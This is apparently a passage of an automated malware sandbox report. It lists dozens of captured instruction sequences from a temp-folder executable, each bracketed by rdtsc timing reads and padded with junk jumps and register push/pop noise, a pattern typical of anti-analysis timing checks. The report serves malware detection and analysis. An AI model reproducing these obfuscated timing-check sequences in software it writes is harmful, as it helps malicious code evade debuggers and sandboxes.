                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC058F second address: 4BC0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC0593 second address: 4BC0597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60957 second address: 4B6095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B6095D second address: 4B60963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60963 second address: 4B60985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B60985 second address: 4B60989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB0788 second address: 4BB07B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C88825Eh 0x00000009 xor ch, FFFFFF98h 0x0000000c jmp 00007FD81C88825Bh 0x00000011 popfd 0x00000012 mov bl, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop ebx 0x0000001d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB07B4 second address: 4BB07CC instructions: 0x00000000 rdtsc 0x00000002 mov ch, 74h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, di 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, 611CEB2Fh 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BB07CC second address: 4BB07EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888261h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov si, 05E9h 0x00000012 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4BC02A1 second address: 4BC030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD81D0C8431h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD81D0C842Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD81D0C8430h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD81D0C8437h 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B8092D second address: 4B809E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888267h 0x00000009 xor eax, 5BA5526Eh 0x0000000f jmp 00007FD81C888269h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD81C888266h 0x00000023 and ax, 4118h 0x00000028 jmp 00007FD81C88825Bh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FD81C888268h 0x00000034 xor eax, 54282B78h 0x0000003a jmp 00007FD81C88825Bh 0x0000003f popfd 0x00000040 popad 0x00000041 mov dword ptr [esp], ebp 0x00000044 jmp 00007FD81C888266h 0x00000049 mov ebp, esp 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e movzx eax, dx 0x00000051 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B809E5 second address: 4B80A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD81D0C8430h 0x0000000f or ecx, 7665F768h 0x00000015 jmp 00007FD81D0C842Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD81D0C8435h 0x00000026 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B80A40 second address: 4B80A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B80A46 second address: 4B80A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40285 second address: 4B4028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 74AAF764h 0x00000009 popad 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B4028F second address: 4B40295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40295 second address: 4B40299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40299 second address: 4B402B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD81D0C842Ah 0x00000013 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B402B1 second address: 4B402B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B402B5 second address: 4B402BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B402BB second address: 4B40337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD81C888261h 0x00000014 and eax, 4D6513B6h 0x0000001a jmp 00007FD81C888261h 0x0000001f popfd 0x00000020 mov ax, 8DA7h 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 jmp 00007FD81C88825Ah 0x0000002b push eax 0x0000002c jmp 00007FD81C88825Bh 0x00000031 xchg eax, ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FD81C88825Bh 0x0000003b jmp 00007FD81C888263h 0x00000040 popfd 0x00000041 movzx esi, di 0x00000044 popad 0x00000045 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40337 second address: 4B403A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81D0C8430h 0x00000009 or cl, FFFFFF98h 0x0000000c jmp 00007FD81D0C842Bh 0x00000011 popfd 0x00000012 mov eax, 37F4AD4Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c mov cx, F747h 0x00000020 mov bh, cl 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD81D0C842Bh 0x0000002d and ecx, 0CCD790Eh 0x00000033 jmp 00007FD81D0C8439h 0x00000038 popfd 0x00000039 mov esi, 6E942617h 0x0000003e popad 0x0000003f rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B403A1 second address: 4B40453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e mov di, FDCCh 0x00000012 popad 0x00000013 mov ebx, dword ptr [ebp+10h] 0x00000016 pushad 0x00000017 jmp 00007FD81C888261h 0x0000001c jmp 00007FD81C888260h 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FD81C888260h 0x00000028 push eax 0x00000029 pushad 0x0000002a mov al, bh 0x0000002c mov bx, ax 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 jmp 00007FD81C888264h 0x00000036 mov esi, dword ptr [ebp+08h] 0x00000039 jmp 00007FD81C888260h 0x0000003e xchg eax, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov dl, 1Bh 0x00000044 pushfd 0x00000045 jmp 00007FD81C888266h 0x0000004a sub ecx, 63EA3438h 0x00000050 jmp 00007FD81C88825Bh 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40453 second address: 4B4046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8434h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B4046B second address: 4B4046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B4046F second address: 4B404A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD81D0C842Eh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov dl, ah 0x00000012 mov edx, 6B20A75Eh 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b mov di, 4436h 0x0000001f mov al, bh 0x00000021 popad 0x00000022 je 00007FD88F4C65A1h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B404A6 second address: 4B404AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B404AA second address: 4B404B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B404B0 second address: 4B404FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888268h 0x00000009 adc esi, 24392288h 0x0000000f jmp 00007FD81C88825Bh 0x00000014 popfd 0x00000015 mov ah, 9Ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD81C88825Dh 0x0000002a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B404FB second address: 4B40501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40501 second address: 4B40593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C88825Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD88EC86370h 0x0000000f pushad 0x00000010 call 00007FD81C88825Eh 0x00000015 call 00007FD81C888262h 0x0000001a pop ecx 0x0000001b pop ebx 0x0000001c mov ch, E6h 0x0000001e popad 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FD81C888264h 0x0000002b sub esi, 60E27CD8h 0x00000031 jmp 00007FD81C88825Bh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FD81C888268h 0x0000003d sbb ah, 00000038h 0x00000040 jmp 00007FD81C88825Bh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40593 second address: 4B405C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81D0C842Fh 0x00000009 xor ah, FFFFFFFEh 0x0000000c jmp 00007FD81D0C8439h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B405C5 second address: 4B405E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81C888263h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B405E4 second address: 4B40657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007FD81D0C842Eh 0x00000014 jne 00007FD88F4C6499h 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e pushfd 0x0000001f jmp 00007FD81D0C842Ah 0x00000024 and si, 50B8h 0x00000029 jmp 00007FD81D0C842Bh 0x0000002e popfd 0x0000002f popad 0x00000030 test byte ptr [esi+48h], 00000001h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD81D0C8435h 0x0000003b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B40657 second address: 4B406C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD81C888267h 0x00000009 sub ch, FFFFFFDEh 0x0000000c jmp 00007FD81C888269h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD81C888260h 0x00000018 add eax, 22BC0FD8h 0x0000001e jmp 00007FD81C88825Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 jne 00007FD88EC86242h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B406C0 second address: 4B406C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 23h 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B700CB second address: 4B700D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B700D1 second address: 4B700D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B700D7 second address: 4B70154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov esi, 6B0EFC1Dh 0x00000014 mov dx, si 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD81C888261h 0x00000022 sub esi, 17A3C166h 0x00000028 jmp 00007FD81C888261h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FD81C888260h 0x00000034 sub eax, 716CD908h 0x0000003a jmp 00007FD81C88825Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70154 second address: 4B70173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD81D0C842Fh 0x00000008 pop esi 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70173 second address: 4B70177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70177 second address: 4B7017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7017D second address: 4B70183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70183 second address: 4B70187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70187 second address: 4B701E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD81C88825Ah 0x00000010 adc si, CDC8h 0x00000015 jmp 00007FD81C88825Bh 0x0000001a popfd 0x0000001b mov cx, F73Fh 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 jmp 00007FD81C888262h 0x00000026 push eax 0x00000027 jmp 00007FD81C88825Bh 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 push eax 0x00000032 mov dx, 5522h 0x00000036 pop ebx 0x00000037 popad 0x00000038 mov esi, dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov si, bx 0x00000041 mov eax, ebx 0x00000043 popad 0x00000044 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B701E9 second address: 4B701EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B701EF second address: 4B701F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B701F3 second address: 4B7023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c mov ax, 21EFh 0x00000010 pop ecx 0x00000011 mov cx, bx 0x00000014 popad 0x00000015 test esi, esi 0x00000017 pushad 0x00000018 jmp 00007FD81D0C842Dh 0x0000001d popad 0x0000001e je 00007FD88F48E59Bh 0x00000024 jmp 00007FD81D0C842Dh 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push edx 0x00000034 pop ecx 0x00000035 movsx ebx, cx 0x00000038 popad 0x00000039 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7023C second address: 4B70242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70242 second address: 4B70260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C8432h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70260 second address: 4B70266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70266 second address: 4B7026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7026A second address: 4B702F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD88EC4E387h 0x0000000e pushad 0x0000000f call 00007FD81C88825Fh 0x00000014 push esi 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007FD81C888265h 0x0000001d or cx, CF26h 0x00000022 jmp 00007FD81C888261h 0x00000027 popfd 0x00000028 popad 0x00000029 test byte ptr [76FC6968h], 00000002h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FD81C888263h 0x00000039 xor ax, 725Eh 0x0000003e jmp 00007FD81C888269h 0x00000043 popfd 0x00000044 mov ah, E3h 0x00000046 popad 0x00000047 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B702F9 second address: 4B702FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B702FF second address: 4B70303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70303 second address: 4B7033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD88F48E4D1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD81D0C842Dh 0x00000017 and cl, 00000046h 0x0000001a jmp 00007FD81D0C8431h 0x0000001f popfd 0x00000020 movzx eax, di 0x00000023 popad 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7033B second address: 4B70341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70341 second address: 4B7036B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FD81D0C8430h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD81D0C842Ah 0x0000001a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B7036B second address: 4B70371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 4B70371 second address: 4B70376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
